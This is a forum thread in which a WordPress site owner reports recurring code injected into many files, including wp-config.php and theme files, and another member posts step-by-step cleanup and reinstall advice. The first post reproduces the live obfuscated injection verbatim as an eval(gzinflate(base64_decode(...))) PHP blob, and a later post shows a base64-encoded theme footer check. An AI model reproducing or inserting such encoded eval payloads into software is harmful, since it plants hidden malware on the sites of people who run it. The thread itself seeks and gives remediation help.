Latest Announcemnent
New thread
Status
Not open for further replies.
I

iRob

Active Member
107
2012
3
0
I'm having problem in wp.I don't know how it came or someone injected the code.It seems like this:
Code: 
<?php eval(gzinflate(base64_decode('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')));?>

I found this code in many files of my wp like index.php , wp-config.php,wp-setting.php, In my theme header,footer,function.php & in other places.
Because of this my site is not functioning well & can't access my wp dashboard.
Before I can use my dashboard I have to delete that code.But this code re-appearing again & again.

Can anyone help me what should I do?
 
25 comments
Yup restored the code
Code: 
eval(base64_decode('ZnVuY3Rpb24gdGhlbWVfdXNhZ2VfbWVzc2FnZSgpIHsgDQpnbG9iYWwgJHRoZW1lbmFtZSwgJHNob3J0bmFtZTsNCiRya191cmwgPSBnZXRfYmxvZ2luZm8oJ3RlbXBsYXRlX2RpcmVjdG9yeScpOw0KZWNobyAoIjxkaXYgc3R5bGU9XCJ3aWR0aDo4MDBweDsgbWFyZ2luOmF1dG87IG1hcmdpbi10b3A6MzBweDsgcGFkZGluZzoxNXB4OyB0ZXh0LWFsaWduOmNlbnRlcjsgYmFja2dyb3VuZC1jb2xvcjojRkZGRkZGOyBib3JkZXI6NXB4IHNvbGlkICNGRjAwMDA7IGNvbG9yOiMwMDAwMDBcIj4iKTsNCmVjaG8gKCI8ZGl2PjxpbWcgc3JjPVwiJHJrX3VybC9pbWFnZXMvZXJyb3IuanBnXCIgYWx0PVwiRXJyb3JcIiAvPjwvZGl2PiIpOw0KZWNobyAoIjxkaXYgc3R5bGU9XCJmb250LXNpemU6MzBweDsgbGluZS1oZWlnaHQ6IDM2cHg7XCI+PGI+T3Bwcy4uWW91IEhhdmUgTW9kaWZpZWQgVGhlIEZvb3RlciBMaW5rcy4uVGhpcyBUaGVtZSBJcyBOb3cgRGVhY3RpdmF0ZWQhPC9iPjwvZGl2PiIpOw0KZWNobyAoIjxkaXYgc3R5bGU9XCJmb250LXNpemU6MTJweDtcIj48Yj5UaGlzIFRoZW1lIElzIFJlbGVhc2VkIEZyZWUgRm9yIFVzZSBVbmRlciBDcmVhdGl2ZSBDb21tb25zIExpY2VuY2UuIEFsbCBMaW5rcyBJbiBUaGUgRm9vdGVyIE11c3QgUmVtYWluIEludGFjdCBBUyBJUy4gUGxlYXNlIEFwcHJlY2lhdGUgVGhlc2UgU3VwcG9ydGVycyBFZmZvcnQgSW4gUHJvdmlkaW5nIFlvdSBUaGlzIEdyZWF0IFRoZW1lIEZvciBGcmVlLjwvYj48L2Rpdj4iKTsNCmVjaG8gKCI8ZGl2IHN0eWxlPVwiZm9udC1zaXplOjE5cHg7IHBhZGRpbmctdG9wOjIwcHg7XCI+PGI+UGxlYXNlIEZvbGxvdyBUaGVzZSBTdGVwcyBUbyBSZXN0b3JlIFRoZSBGb290ZXI6PC9iPjwvZGl2PjxvbCBzdHlsZT1cIm1hcmdpbjowOyBwYWRkaW5nOjIwcHg7IHRleHQtYWxpZ246bGVmdDtcIj48bGk+UGxlYXNlIHJlZG93bmxvYWQgPGEgaHJlZj1cImh0dHA6Ly93d3cubWFncHJlc3MuY29tL3dvcmRwcmVzcy10aGVtZXMvJHNob3J0bmFtZS5odG1sXCIgdGFyZ2V0PVwiX2JsYW5rXCI+JHRoZW1lbmFtZSBUaGVtZTwvYT4gZGlyZWN0bHkgb24gb3VyIHdlYnNpdGUuPC9saT48bGk+RGVsZXRlLCB1cGxvYWQgYW5kIGFjdGl2YXRlIHRoZSB0aGVtZSBhZ2Fpbi48L2xpPjxsaT5GaW5hbGx5LCByZWZyZXNoIHlvdXIgcGFnZSB0byBnbyBiYWNrIHRvIHlvdXIgaG9tZXBhZ2UuPC9saT48L29sPjwvZGl2PiIpO30NCmZ1bmN0aW9uIGNoZWNrX3RoZW1lX2Zvb3RlcigpIHsgDQokbCA9ICc8YSBocmVmPSJodHRwOi8vd3d3Lm1hZ3ByZXNzLmNvbS93b3JkcHJlc3MtdGhlbWVzL2Jpem9tLmh0bWwiPkJpem9tIFdvcmRQcmVzcyBUaGVtZTwvYT4gQnkgPGEgaHJlZj0iaHR0cDovL2ZyZWViaW5nb25vZGVwb3NpdC5uZXQvIj5mcmVlYmluZ29ub2RlcG9zaXQubmV0PC9hPic7DQokZiA9IGRpcm5hbWUoX19maWxlX18pIC4gIi9mb290ZXIucGhwIjsNCiRmZCA9IGZvcGVuKCRmLCAiciIpOw0KJGMgPSBmcmVhZCgkZmQsIGZpbGVzaXplKCRmKSk7DQpmY2xvc2UoJGZkKTsgaWYgKHN0cnBvcygkYywgJGwpID09IDApIHsNCnRoZW1lX3VzYWdlX21lc3NhZ2UoKTsgZGllOyB9fQ0KZnVuY3Rpb24gY2hlY2tfdGhlbWVfaGVhZGVyKCkgeyANCmlmICghKGZ1bmN0aW9uX2V4aXN0cygiZnVuY3Rpb25zX2ZpbGVfZXhpc3RzIikgJiYgZnVuY3Rpb25fZXhpc3RzKCJ0aGVtZV9mb290ZXJfdiIpKSkgeyB0aGVtZV91c2FnZV9tZXNzYWdlKCk7IGRpZTsgfX0NCmZ1bmN0aW9uIGZ1bmN0aW9uc19maWxlX2V4aXN0cygpIHsNCmlmICghZmlsZV9leGlzdHMoZGlybmFtZShfX2ZpbGVfXykgLiAiL2Z1bmN0aW9ucy5waHAiKSB8fCAhZnVuY3Rpb25fZXhpc3RzKCJ0aGVtZV91c2FnZV9tZXNzYWdlIikgKSB7IHRoZW1lX3VzYWdlX21lc3NhZ2UoKTsgZGllOyB9fQ0KYWRkX2FjdGlvbignd3BfaGVhZCcsICdjaGVja190aGVtZV9oZWFkZXInKTsNCmFkZF9hY3Rpb24oJ3dwX2hlYWQnLCAnZnVuY3Rpb25zX2ZpbGVfZXhpc3RzJyk7DQpjaGVja190aGVtZV9mb290ZXIoKTs='));?>

Site working now.
 
Okay iRob, that's good to know, now, what we're going to do here is try clean your wordpress blog from the hacking.
Make sure you follow each of the below steps precisely and try to remain calm throughout all the time.

Backup the site and the database.
 Yes, do it again, completely everything, don't forget the database (MySQL)!

Make a copy of any uploaded files, such as images, that are referenced .
Go to your uploads folder on cPanel or FTP and download everything that you might need, theme files, images and such.

Download a fresh version of WP, all of the plugins you need, and a clean template.
A tedious task perhaps, if you are not familiar with the whole process (which I believe you are), it can be made easier if you use EasyWP WordPress Installer, a script which installs a fresh copy of your WordPress in under a few minutes.
Simply download and unzip EasyWP.zip (download link on this page). Upload easywp.php (a single file that is a mere 8KB) to the folder where you want to install your blog. Any directory will do, including the root directory, as long as WordPress isn’t already installed in it (this script is designed to do clean installs only) and PHP can write to that directory (either through setting the permissions, or through PHPSuExec running on your server). Next, visit the page wherever you uploaded it to
Code: 
http://www.yourserver.com/blog/easywp.php
Fill out the form, and hit the “Go!” button.
EasyWP will download the latest version of WordPress, unzip it into the directory where you want to host your blog, and modify your configuration file based on the information you entered into the form. Then it tests your database connection. If that fails, it gives you a chance to re-edit the info you entered, so if you made a mistake there is no need to edit and re-upload the config file separately
(just like when you install WordPress without the script, you do have to create the database and user beforehand). After that it takes you to the normal WordPress setup page, where you finish the process.

Delete all of the files and folders in the WP directory, either through FTP (slower) or through cPanel’s File Manager (faster).
Now that you have fresh copies of all the files you need, and copied all of your uploaded images, completely delete the entire directory structure your blog is in. This is the only surefire way to completely remove all possibly infected files. You can do this through FTP, but due to the way that FTP handles folder deletion (ie. it walks the directory structure, stores each and every file name that needs to be deleted, and then sends a delete command for each one), this can be slow and in some instances cause you to get disconnected due to flooding the server with FTP commands. If available it is much faster to do this through either cPanel’s File Manager, or via command line if you happen to have shell access.

Re-upload the new fresh copies you just grabbed.
This step should be self explanatory, but I would like to mention that if your FTP client supports it (I use FileZilla, which does) and your host allows it, then increasing the number of simultaneous connections you use to upload can greatly reduce your overall transfer time, especially on servers or ISP’s where latency is more of an issue than bandwidth. In FileZilla this setting is found by going to “Edit -> Settings -> File transfer settings”:

6. Run the database upgrade (point your browser at /wp-admin/upgrade.php).
This will make any necessary changes to your database structure to support the newest version of WordPress.

7. Immediately change your admin password.
If you have more than one admin (meaning any user with editing capabilities), and cannot get the others to change their passwords right then, I would change their user levels until they can change their passwords as well. If there is anyone in your user list that has editing capabilities, and you do not recognize them, it’s probably best to just delete them altogether.

Go through the posts and repair any damage in the posts themselves.
If this has happened, you will want to delete any links or iframes that were inserted, and restore any lost content. Google and Yahoo’s caches are often a good source of what used to be there if anything got overwritten. The following query run against the database can help you isolate which posts you want to look at:
Code: 
 SELECT * FROM wp_posts WHERE post_content LIKE '%<iframe%' UNION SELECT * FROM wp_posts WHERE post_content LIKE '%<noscript%' UNION SELECT * FROM wp_posts WHERE post_content LIKE '%display:%'
If you did not change the default prefix for WordPress tables, than you can copy and paste that directly into a query window and run it, and it should pull up any posts that have been modified to hide content using any of the methods I have come across so far (iframes, noscript tags, and display:none style attributes). To get to a query window in cPanel, you would click on the MySQL® Databases icon, scroll to the bottom of the page, and then click on phpMyAdmin. Once the new window or tab opens, you would click on the database in the left hand side that your blog was in, and then in the right side at the top click on the SQL tab. Then just paste the query into the large text area and hit the Go button.
Note, however, that there may be other types of injected content that I haven’t seen yet, and that a manual inspection looking for the types of patterns that first alerted you to the fact that your blog was hacked is always a good idea.

Edit your wp-config.php
Change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
Code: 
 define(‘SECRET_KEY’, ’1234567890′ );

Check your .htaccess file in the root of you blog.
If you've never edited it, it'll should look like this:
# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPress
Click to expand...
That file may have this chunk of code too which is to do with the uploader:
<ifmodule mod_security.c>
<files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</files>
</ifmodule>​
Click to expand...
To sum it up, what you need to do is:

  1. Backup the whole WordPress database (using the Export tool and via an SQL dump/cPanel)
  2. Back the whole WordPress directory for analysis and removed it from the site
  3. Re-Upload latest WordPress files which you downloaded.
  4. Upgrade your WordPress (if Available)
  5. Do a final password change.
Good luck, if you need further assistance please reply.
 
Last edited:
Thanks Raptile for your nice support & superb instruction.I would definately do these steps as soon as I will have enough time.
Thanks again
 
No problem iRob, please do report back with the results, if you come to a solution know that you will need further protection too, which I would instruct you upon once you clean your WordPress website.
Good luck once again.
 
OK I've tried everything to tackle the problem without reinstalling the wp but all went in vain & problem still exists.So I've decided to reinstall everything with new one & want my posts to be safe & can be restored too.
So can anyone instruct me in a bit detail how can I do it safely?
Do I only need to back up MYSQL?
Am I supposed to delete entire home directory or just to delete the files within public_html?

Thanks
Regards
 
Status
Not open for further replies.
Back
Top